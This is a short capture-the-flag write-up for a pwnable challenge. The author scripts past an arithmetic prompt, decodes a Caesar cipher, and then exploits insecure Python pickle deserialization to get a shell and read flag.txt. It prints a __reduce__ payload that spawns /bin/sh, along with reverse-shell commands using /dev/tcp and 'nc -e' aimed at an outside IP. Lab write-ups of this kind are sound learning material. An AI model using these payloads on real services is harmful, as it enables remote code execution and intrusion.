Bubble Bass has a vulnerable service. Can you exploit it and read the flag.txt file?
Category: Potent PwnablesPoints: 300
self.received = self.request.recv(1024).strip()
self.result = cPickle.loads(self.received)
Connected to the server..
..the server asks me to add two numbers, and quits w/ 1 second timeout, no time to manually reply.
No problem, wrote a py socket script...
Now clearly its a Caesar cipher.
Solved w/ my caesar deco..
Now comes the real challenge..
..the server asks me for a file, tried
flag.txt, of course no success.. everything containing
Really? Maybe next time..
Okay, back to the given clue:
self.received = self.request.recv(1024).strip() self.result = cPickle.loads(self.received)
hmm.. bubble bass.. pickles.. spongebob? hehe..
Tried the test exploit:
class RunBinSh(object): def __reduce__(self): return (subprocess.Popen, (('/bin/sh',),))
..and got the
Server received message from the server, but no shell.. we can't see the server raw output, but im on the right way 4 sure..
nc server locally
nc -vv -l -p 6888 to wait for connections and tried to execute on server side the classic
/bin/sh </dev/tcp/220.127.116.11/6888 >&0 2>&0, no success.. the server accept my command but no connection here, maybe some filtering..
Ok, lets test if
nc is enabled on server side..
nc -e /bin/sh 18.104.22.168 6888
we got a reverse shell..
cat flag.txt 4 the win!
Awesome contest shellterlabs.com.
I arrived too late and could not could not try the other challs, but the next one can count on me :)